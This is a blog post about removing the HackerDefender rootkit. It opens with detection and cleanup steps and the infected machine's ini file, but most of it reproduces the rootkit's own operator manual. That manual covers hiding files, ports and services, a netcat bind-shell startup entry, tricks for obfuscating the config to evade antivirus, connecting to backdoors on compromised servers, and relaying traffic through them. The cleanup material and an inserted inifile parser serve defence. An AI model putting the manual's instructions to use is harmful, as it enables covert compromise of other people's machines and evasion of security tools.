A friend's (Phil Kerkel) laptop recently got infected with HackerDefender, which cost him about a day's worth of work. This particular infection seems to be harmless, but something like this invading a system is scary when that system holds all your own data and, in most cases, a lot of your clients' data too!

Basically, these guys use the FTP services installed on Windows machines sitting on high-speed networks (such as DSL/cable, or university campuses) so they can use that fat pipe to distribute copyrighted material such as films, games and software. Sometimes these FTP servers are protected by a piece of software called HackerDefender; this software is used to hide files, processes and even ports from the user and from investigating parties, and it is particularly difficult to root out.

Detecting it: if a remote port scan reports a port as open and you can FTP into that port, but aports ( http://bagpuss.swan.ac.uk/comms/aports.exe ) does not show the port locally, you can pretty much assume a version of HackerDefender is installed.

How to Clean It:

Boot Windows into Rescue mode as follows:

Insert the Windows OS Installation CD into the Drive.

  • Boot from the CD
  • Choose ‘R’ to enter the Rescue Console
  • Choose the Windows installation you want to Clean from the list presented to you.
  • Enter the Administrator Password.

Once in the Recovery Console, you have a few commands for this, including:

listsvc - lists services that can be enabled or disabled

enable - enables a service, with one of the following start types:

  • SERVICE_DISABLED
  • SERVICE_BOOT_START
  • SERVICE_SYSTEM_START
  • SERVICE_AUTO_START
  • SERVICE_DEMAND_START

disable - disables a service, but prints out the previous start type, which should be recorded in case you need to re-enable the service.

Clean up Trojans/payloads protected by HackerDefender:

Once the machine has rebooted, search the registry for the name of the service that you disabled in the previous section; this should lead you to the HackerDefender executable and, more importantly, its .ini file (not necessarily with a .ini extension; it may have a different one).

Open the ini file; in it you should find a number of files, ports and services that HackerDefender is defending. Systematically find each of these services in the registry and delete them (they will probably appear more than once); likewise find all of the referenced files and delete them too.

It's also worth having a look in the registry for 'run on boot' programs; go to this key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Have a look for any of these and delete them if they are present:

  • "spoolsvr.exe"=-
  • "Kernel32"=-
  • "GLSetIT32"=-
  • "iTouch.exe"=-
  • "Localsys.exe"=-
  • "explorer.exe"=-
  • "msiexe.exe"=-
  • "service"=-

Here is the .ini file from Phil's machine (he was running Win2K); as you scan it you will see more things you should look out for:

[Hidden Table]
inatjoy.dll
motkrtin.dll
witadr.dll
winunins.exe
winunins.ini
svhost.exe
CWShredder*
HijackThis*
ProceXP*
Spybot*
msconfig*

[Root Processes]
svhost.exe
trj4j6js.exe
winunins.exe

[Hidden Services]
HackerDefender*

[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100

[Hidden RegValues]

[Startup Run]
C:\WINNT\svhost.exe -sr -0

[Free Space]

[Hidden Ports]

[Settings]
Password=qweqwe
BackdoorShell=ddd.exe
FileMappingName=_.-=[PokuS]=-._
ServiceName=HackerDefender100
ServiceDisplayName=Windows System Uninstaller
ServiceDescription=Microsoft System Service
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys

[Comments]

The COOL Stuff:

Now, this is the cool part. I found this on another site and don't want to link to them because who knows what they are running, so this is essentially a copy and paste from them! This is basically how the Trojan works: it shows what exploits it used, what APIs, and how you can "improve on it". A very interesting read, but I would recommend not using any of this for anything other than your own learning!

Essentially everything below is copy and paste with very minor edits:

=====[ 2. Introduction ]=====================================

Hacker Defender (hxdef) is a rootkit for Windows NT 4.0, Windows 2000 and Windows XP; it may also work on the latest NT-based systems. The main code is written in Delphi 6. New functions are written in assembler. The driver code is written in C. The backdoor and redirector clients are coded mostly in Delphi 6.

program uses adapted LDE32
LDE32, Length-Disassembler Engine, 32-bit, (x) 1999-2000 Z0MBiE
special edition for REVERT tool
version 1.05

program uses Superfast/Supertiny Compression/Encryption library
Superfast/Supertiny Compression/Encryption library.
(c) 1998 by Jacky Qwerty/29A.

=====[ 2.1 Idea ]=====================================

The main idea of this program is to rewrite a few memory segments in all running processes. Rewriting some basic modules causes changes in process behaviour. The rewriting must not affect the stability of the system or of running processes.

The program must be absolutely hidden from all others. The user is now able to hide files, processes, system services, system drivers, registry keys and values and open ports, and to cheat with free disk space. The program also masks its changes in memory and hides the handles of hidden processes. The program installs hidden backdoors, registers as a hidden system service and installs a hidden system driver. The backdoor technology allowed the implantation of a redirector.

=====[ 2.2 Licence ]=====================================

This project in version 1.0.0 is open source.

And of course the authors are not responsible for what you're doing with Hacker Defender.

=====[ 3. Usage ]=====================================

Usage of hxdef is quite simple:

hxdef100.exe [inifile]
or
hxdef100.exe [switch]

The default name for the inifile is EXENAME.ini, where EXENAME is the name of the main program's executable without the extension. This is used if you run hxdef without specifying the inifile or if you run it with a switch (so the default inifile is hxdef100.ini).

These switches are available:

-:installonly - only install the service, but do not run
-:refresh - use to update settings from the inifile
-:noservice - doesn't install the service and runs normally
-:uninstall - removes hxdef from memory and kills all running backdoor connections; stopping the hxdef service does the same now

Example:
 >hxdef100.exe -:refresh

Hxdef with its default inifile is ready to run without any change to the inifile. But it's highly recommended to create your own settings. See the Inifile section for more information about the inifile.

The switches -:refresh and -:uninstall can be called only from the original exefile. This means you have to know the name and path of the running hxdef exefile to change settings or to uninstall it.

=====[ 4. Inifile ]=====================================

The inifile must contain nine parts: [Hidden Table], [Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], [Free Space], [Hidden Ports] and [Settings]. In [Hidden Table], [Root Processes], [Hidden Services] and [Hidden RegValues] the character * can be used as a wildcard at the end of a string.

The asterisk can be used only at the end of a string; everything after the first asterisk is ignored. All spaces before the first and after the last other string character are ignored.

Example:
[Hidden Table]
hxdef*

this will hide all files, dirs and processes whose names start with "hxdef".

Hidden Table is a list of files, directories and processes which should be hidden. All files and directories in this list will disappear from file managers. Programs in this list will be hidden in the tasklist. Make sure the main file, the inifile, your backdoor file and the driver file are mentioned in this list.

Root Processes is a list of programs which will be immune to infection. You can see hidden files, directories and programs only with these root programs. So, root processes are for rootkit admins. Being mentioned in Root Processes doesn't mean you're hidden. It is possible to have a root process which is not hidden and vice versa.

Hidden Services is a list of service and driver names which will be hidden in the database of installed services and drivers. The service name for the main rootkit program is HackerDefender100 by default; the driver name for the main rootkit driver is HackerDefenderDrv100. Both can be changed in the inifile.

Hidden RegKeys is a list of registry keys which will be hidden. The rootkit has four keys in the registry by default: HackerDefender100, LEGACY_HACKERDEFENDER100, HackerDefenderDrv100 and LEGACY_HACKERDEFENDERDRV100. If you rename the service name or driver name you should also change this list.

The first two registry keys, for the service and the driver, are the same as their names. The next two are LEGACY_NAME. For example, if you change your service name to BoomThisIsMySvc your registry entry will be LEGACY_BOOMTHISISMYSVC.

Hidden RegValues is a list of registry values which will be hidden.

Startup Run is a list of programs which the rootkit runs after its startup. These programs will have the same rights as the rootkit. The program name is separated from its arguments with a question mark. Do not use " characters. Programs will terminate after user logon. Use common and well-known methods for starting programs after user logon. You can use the following shortcuts here:
 %cmd%  - stands for the system shell executable + path
      (e.g. C:\winnt\system32\cmd.exe)
 %cmddir% - stands for the system shell executable directory
      (e.g. C:\winnt\system32\)
 %sysdir% - stands for the system directory
      (e.g. C:\winnt\system32\)
 %windir% - stands for the Windows directory
      (e.g. C:\winnt\)
 %tmpdir% - stands for the temporary directory
      (e.g. C:\winnt\temp\)

Example:
1)
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe

a netcat shell is run after rootkit startup and listens on port 100

2)
[Startup Run]
%cmd%?/c echo Rootkit started at %TIME% >> %tmpdir%starttime.txt

this will put a time stamp into temporary_directory\starttime.txt (e.g. C:\winnt\temp\starttime.txt) every time the rootkit starts (%TIME% works only with Windows 2000 and higher)

Free Space is a list of hard drives and the number of bytes you want to add to their free space. The list item format is X:NUM, where X stands for the drive letter and NUM is the number of bytes that will be added to its number of free bytes.

Example:
[Free Space]
C:123456789

this will add about 123 MB to the free disk space shown for disk C

Hidden Ports is a list of open ports that you want to hide from applications like OpPorts, FPort, Active Ports, TCPView etc. It has at most 2 lines. The first line format is TCP:tcpport1,tcpport2,tcpport3 …, the second line format is UDP:udpport1,udpport2,udpport3 …

Example:
1)
[Hidden Ports]
TCP:8080,456

this will hide two ports: 8080/TCP and 456/TCP

2)
[Hidden Ports]
TCP:8001
UDP:12345

this will hide two ports: 8001/TCP and 12345/UDP

3)
[Hidden Ports]
TCP:
UDP:53,54,55,56,800

this will hide five ports: 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP

Settings contains eight values: Password, BackdoorShell, FileMappingName, ServiceName, ServiceDisplayName, ServiceDescription, DriverName and DriverFileName.

Password is a 16-character string used when working with the backdoor or redirector. The password can be shorter; the rest is filled with spaces.

BackdoorShell is the name for the copy of the system shell which is created by the backdoor in the temporary directory.

FileMappingName is the name of the shared memory where the settings for hooked processes are stored.

ServiceName is the name of the rootkit service. ServiceDisplayName is the display name for the rootkit service.

ServiceDescription is the description for the rootkit service. DriverName is the name for the hxdef driver.

DriverFileName is the name for the hxdef driver file.

Example:
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdefá$.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
 
This means your backdoor password is "hxdef-rulez"; the backdoor will copy the system shell file (usually cmd.exe) to "hxdefá$.exe" in temp. The name of the shared memory will be "_.-=[Hacker Defender]=-._". The name of the service is "HackerDefender100", its display name is "HXD Service 100", its description is "powerful NT rootkit". The name of the driver is "HackerDefenderDrv100". The driver will be stored in a file called "hxdefdrv.sys".

The extra characters |, <, >, :, \, / and " are ignored on all lines except [Startup Run], [Free Space] and [Hidden Ports] items and values in [Settings] after the first = character. Using extra characters you can make your inifile immune to antivirus systems.

Example:
[H<<>a/"ble]
>h"xdef"*

is the same as

[Hidden Table]
hxdef*

see hxdef100.ini and hxdef100.2.ini for more examples

All strings in inifile except those in Settings and Startup Run are case insensitive.
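As an added example (not the page's own code and not part of hxdef), the following Python applies the inifile rules above (extra-character stripping, the trailing-asterisk wildcard, and the default service, driver and LEGACY_ key names) to a constructed ini modelled on Phil's, and turns it into the cleanup checklist the removal procedure earlier on the page calls for; the sample ini and the function names are assumptions.

```python
# Added example (not hxdef's own code): parse a recovered hxdef-style inifile with the rules quoted above and derive the artefacts a responder must hunt for.
EXTRA_CHARS = set('|<>:\\/"')   # ignored everywhere except VERBATIM sections/values
VERBATIM = {"[Startup Run]", "[Free Space]", "[Hidden Ports]"}
WILDCARD = {"[Hidden Table]", "[Root Processes]", "[Hidden Services]", "[Hidden RegValues]"}

def strip_extra(s):
    return "".join(c for c in s if c not in EXTRA_CHARS)   # de-obfuscate a line

def parse_hxdef_ini(text):
    """Return {section: [items]}; [Settings] items are (key, value) pairs."""
    sections, current = {}, None
    for line in filter(None, map(str.strip, text.splitlines())):
        header = strip_extra(line)
        if header.startswith("[") and header.endswith("]"):
            current = header                       # headers are de-obfuscated too
            sections.setdefault(current, [])
        elif current == "[Settings]":
            key, sep, value = line.partition("=")  # value right of '=' kept verbatim
            if sep:
                sections[current].append((strip_extra(key).strip(), value.strip()))
        elif current in VERBATIM:
            sections[current].append(line)
        elif current is not None:
            item = strip_extra(line).strip()
            if current in WILDCARD and "*" in item:
                item = item.split("*", 1)[0] + "*"  # prefix wildcard; rest ignored
            if item:
                sections[current].append(item)
    return sections

def cleanup_checklist(sections):
    """Files, services, registry keys and ports to look for, including derived ones."""
    cfg = dict(sections.get("[Settings]", []))
    svc = cfg.get("ServiceName", "HackerDefender100")   # hxdef's documented defaults
    drv = cfg.get("DriverName", "HackerDefenderDrv100")
    ports = {"TCP": [], "UDP": []}
    for line in sections.get("[Hidden Ports]", []):     # e.g. "TCP:8080,456"
        proto, _, plist = line.partition(":")
        if proto.strip().upper() in ports:
            ports[proto.strip().upper()] += [int(p) for p in plist.split(",") if p.strip().isdigit()]
    return {
        "files": sections.get("[Hidden Table]", []) + [cfg[k] for k in ("DriverFileName", "BackdoorShell") if k in cfg],
        "services": sorted({svc, drv} | set(sections.get("[Hidden Services]", []))),
        "regkeys": sorted({svc, drv, "LEGACY_" + svc.upper(), "LEGACY_" + drv.upper()} | set(sections.get("[Hidden RegKeys]", []))),
        "startup": sections.get("[Startup Run]", []),
        "hidden_ports": ports,
    }

# Constructed sample modelled on the ini above, with an obfuscated header and lines.
SAMPLE_INI = r"""[H<idden T>able]
svhost.exe
Hijack|This*bait
[Startup Run]
C:\WINNT\svhost.exe -sr -0
[Hidden Ports]
TCP:8080,456
[Settings]
Pass|word=qweqwe
DriverFileName=hxdefdrv.sys"""
```

The hidden_ports list is what the cross-view check at the top of the page compares against a remote scan; everything else is the registry and file hunt list.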

=====[ 5. Backdoor ]=====================================

The rootkit hooks some API functions connected with receiving packets from the net. If the incoming data equals a 256-bit-long key, the password and service are verified, a copy of a shell is created in temp, an instance of it is created and the next incoming data is redirected to this shell.

Because the rootkit hooks all processes in the system, all TCP ports on all servers will be backdoors. For example, if the target has port 80/TCP open for HTTP, then this port will also be available as a backdoor. The exception here is ports opened by the System process, which is not hooked. This backdoor will work only on servers where the incoming buffer is larger than or equal to 256 bits. But this feature is on almost all standard servers like Apache, IIS, Oracle.

The backdoor is hidden because its packets go through common servers on the system. So, you are not able to find it with a classic portscanner and this backdoor can easily go through a firewall. The exception to this is classic proxies which are protocol oriented, e.g. for FTP or HTTP.

During tests on IIS services it was found that the HTTP server does not log any of these connections; FTP and SMTP servers log only the disconnection at the end. So, if you run hxdef on a server with the IIS web server, the HTTP port is probably the best port for backdoor connections on this machine.

You have to use a special client if you want to connect to the backdoor. The program bdcli100.exe is used for this.

Usage: bdcli100.exe host port password

Example:
 >bdcli100.exe www.windowsserver.com 80 hxdef-rulez

this will connect to the backdoor if you rooted www.windowsserver.com before and left the default hxdef password.

The client for version 1.0.0 is not compatible with servers of older versions.

=====[ 5.1 Redirector ]=====================================

The redirector is based on the backdoor technology. The first connection packets are the same as in a backdoor connection. That means you use the same ports as for the backdoor. The next packets are special packets for the redirector only. These packets are made by the redirector base, which is run on the user's computer. The first packet of a redirected connection defines the target server and port.

The redirector base saves its settings into its inifile, whose name depends on the base exefile name (so the default is rdrbs100.ini). If this file doesn't exist when the base is run, it is created automatically. It is better not to modify this inifile externally. All settings can be changed from the base console.

If we want to use the redirector on a server where the rootkit is installed, we have to run the redirector base on localhost first. Then in the base console we have to create a mapped port routed to the server with hxdef. Finally we can connect to the localhost base on the chosen port and transfer data. Redirected data is coded with the rootkit password. In this version the connection speed is limited to about 256 kBps. The redirector is not intended to be used for high-speed connections in this version. The redirector is also limited by the system where the rootkit runs. The redirector works with the TCP protocol only.

In this version the base is controlled with 19 commands. These are not case sensitive. Their function is described in the HELP command. During base startup the commands in the startup-list are executed. Startup-list commands are edited with the commands which start with SU.

The redirector differentiates between two connection types (HTTP and other). If the connection is of the other type, packets are not changed. If it is the HTTP type, the Host parameter in the HTTP header is changed to the target server. The maximum redirector count on one base is 1000.

The redirector base fully works only on NT boxes. Only on NT does the program have a tray icon and can you hide the console with the HIDE command. Only on NT can the base be run in silent mode, where it has no output, no icon and only executes the commands in the startup-list.

Examples:

1) getting mapped port info:

 >MPINFO
 No mapped ports in the list.

2) add the command MPINFO to the startup-list and get the startup-list commands:

 >SUADD MPINFO
 >sulist
 0) MPINFO

3) using the HELP command:

 >HELP
 Type HELP COMMAND for command details.
 Valid commands are:
 HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD, DEL,
 DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
 >HELP ADD
 Create mapped port. You have to specify domain when using HTTP type.
 usage: ADD <TARGET SERVER> [TYPE] [DOMAIN]
 >HELP EXIT
 Kill this application. Use DIS flag to discard unsaved data.
 usage: EXIT [DIS]

4) add a mapped port: we want to listen on localhost on port 100, the rootkit is installed on server 200.100.2.36 on port 80, the target server is www.google.com on port 80, the rootkit's password is bIgpWd, the connection type is HTTP, and the IP address of the target server (www.google.com), which we always have to know, is 216.239.53.100:

 >ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com

the command ADD can be run without parameters; in this case we are asked for every parameter separately

5) now we can check the mapped ports again with MPINFO:

 >MPINFO
 There are 1 mapped ports in the list. Currently 0 of them open.

6) enumeration of the mapped port list:

 >LIST
 000) 100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP

7) detailed description of one mapped port:

 >DETAIL 0
 Listening on port: 100
 Mapping server address: 200.100.2.36
 Mapping server port: 80
 Target server address: 216.239.53.100
 Target server port: 80
 Password: bIgpWd
 Port type: HTTP
 Domain name for HTTP Host: www.google.com
 Current state: CLOSED

8) we can test whether the rootkit is installed with our password on the mapping server 200.100.2.36 (but this is not needed if we are sure about it):

 >TEST 0
 Testing 0) 200.100.2.36:80:bIgpWd - OK

if the test fails it returns

 Testing 0) 200.100.2.36:80:bIgpWd - FAILED

9) the port is still closed and before we can use it we have to open it with the OPEN command; we can close the port with the CLOSE command when it is open; we can use the flag ALL when we want to apply these commands to all ports in the list; the current state after the required action is written after a while:

 >OPEN 0
 Port number 0 opened.
 >CLOSE 0
 Port number 0 closed.

or

 >OPEN ALL
 Port number 0 opened.

10) to save the current settings and lists we can use the SAVE command; this saves everything to the inifile (saving is also done by the command EXIT without the DIS flag):

 >SAVE
 Saved successfully.

An open port is all we need for data transfer. Now you can open your favourite explorer and type http://localhost:100/ as the URL. If there are no problems you will see the main page of www.google.com load.

The first packets of a connection can be delayed up to 5 seconds, but the others are limited only by the speed of the server, your internet connection speed and the redirector technology, which is about 256 kBps in this version.

=====[ 6.2 Hooked API ]=====================================

List of API functions which are hooked:

Kernel32.ReadFile
Ntdll.NtQuerySystemInformation (classes 5 and 16)
Ntdll.NtQueryDirectoryFile
Ntdll.NtVdmControl
Ntdll.NtResumeThread
Ntdll.NtEnumerateKey
Ntdll.NtEnumerateValueKey
Ntdll.NtReadVirtualMemory
Ntdll.NtQueryVolumeInformationFile
Ntdll.NtDeviceIoControlFile
Ntdll.NtLdrLoadDll
Ntdll.NtOpenProcess
Ntdll.NtCreateFile
Ntdll.NtLdrInitializeThunk
WS2_32.recv
WS2_32.WSARecv
Advapi32.EnumServiceGroupW
Advapi32.EnumServicesStatusExW
Advapi32.EnumServicesStatusExA
Advapi32.EnumServicesStatusA